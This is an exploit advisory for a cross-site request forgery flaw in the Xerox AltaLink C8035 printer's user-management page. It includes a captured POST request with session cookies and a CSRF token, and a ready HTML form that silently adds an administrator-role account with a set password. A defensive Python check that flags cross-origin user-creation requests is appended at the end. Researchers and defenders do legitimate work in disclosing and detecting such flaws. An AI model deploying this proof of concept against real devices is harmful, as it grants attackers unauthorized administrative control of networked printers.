# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)  
# Date: 2018-12-17   
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: https://www.xerox.com/  
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series  
# Software : Xerox Printer  
# Product Version: AltaLink C8035  
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)  
# Vulnerability : Cross-Site Request Forgery  
# CVE : CVE-2019-19832  
  
# Description :  
  
A CSRF vulnerability was discovered in the Xerox AltaLink C8035 printer.  
A request to add a user is made through the Device User Database form, which posts to the xerox.set URI.  
This request was captured with a proxy, and a CSRF PoC HTML file was prepared from it.  
(The frmUserName value must be unique.)  
  
  
# HTTP POST Request :  
  
POST /dummypost/xerox.set HTTP/1.1  
Host: 158.162.130.37  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 707  
Origin: https://158.162.130.37  
Connection: close  
Referer: https://158.162.130.37/properties/authentication/UserEdit.php?nav_point_key=10  
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp  
Upgrade-Insecure-Requests: 1  
  
NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10  
  
# CSRF PoC HTML :  
  
<html>  
<!-- CSRF PoC - generated by Burp Suite Professional -->  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://158.162.130.37/dummypost/xerox.set" method="POST">  
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?" />  
<input type="hidden" name="isRoles" value="True" />  
<input type="hidden" name="isPassword" value="True" />  
<input type="hidden" name="isCreate" value="True" />  
<input type="hidden" name="rolesStr" value="6,1,2" />  
<input type="hidden" name="limited" value="0" />  
<input type="hidden" name="oid" value="0" />  
<input type="hidden" name="minLength" value="1" />  
<input type="hidden" name="maxLength" value="63" />  
<input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />  
<input type="hidden" name="isUserNameDisallowed" value="TRUE" />  
<input type="hidden" name="isNumberRequired" value="" />  
<input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />  
<input type="hidden" name="currentPage" value="/properties/authentication/UserEdit.php?nav_point_key=10" />  
<input type="hidden" name="_fun_function" value="HTTP_Set_User_Edit_fn" />  
<input type="hidden" name="frmFriendlyName" value="Ismail Tasdelen" />  
<input type="hidden" name="frmUserName" value="ismailtasdelen" />  
<input type="hidden" name="frmNewPassword" value="Test1234!" />  
<input type="hidden" name="frmRetypePassword" value="Test1234!" />  
<input type="hidden" name="frmOldPassword" value="undefined" />  
<input type="hidden" name="SaveURL" value="/properties/authentication/UserEdit.php?nav_point_key=10" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>
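
A defensive check for the request shown above, as an added example that is not part of the original advisory or any Xerox code: it flags user-creation POSTs to xerox.set whose Origin (or Referer) host does not match the Host header, as a reverse proxy or log-review script in front of the device could. The function names and the sample requests are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs, urlsplit

# Path and form fields taken from the request shown on this page.
TARGET_PATH = "/dummypost/xerox.set"
USER_EDIT_FN = "HTTP_Set_User_Edit_fn"

# Constructed sample requests (192.0.2.10 is a documentation address).
BODY = "isCreate=True&_fun_function=HTTP_Set_User_Edit_fn&frmUserName=newuser"
SAME_SITE = (
    "POST /dummypost/xerox.set HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    "Origin: https://192.0.2.10\r\n\r\n" + BODY
)
CROSS_SITE = SAME_SITE.replace("Origin: https://192.0.2.10", "Origin: https://other.example")


def parse_request(raw: str):
    """Split a raw HTTP request into method, path, headers and form fields."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    form = {k: v[0] for k, v in parse_qs(body.strip(), keep_blank_values=True).items()}
    return method, urlsplit(target).path, headers, form


def source_host(headers):
    """Host the browser says the request came from (Origin, else Referer)."""
    for name in ("origin", "referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).netloc.lower()  # an Origin of "null" yields ""
    return ""


def is_cross_site_user_create(raw: str) -> bool:
    """True for a user-creation POST to xerox.set not sent from the device's own UI."""
    method, path, headers, form = parse_request(raw)
    if method != "POST" or path != TARGET_PATH:
        return False
    if form.get("_fun_function") != USER_EDIT_FN or form.get("isCreate") != "True":
        return False
    # Missing Origin and Referer is treated as cross-site (fail closed).
    return source_host(headers) != headers.get("host", "").lower()


if __name__ == "__main__":
    print(is_cross_site_user_create(SAME_SITE), is_cross_site_user_create(CROSS_SITE))
```

The comparison is a literal host match, so a deployment that reaches the device under several names needs each name normalised before comparing.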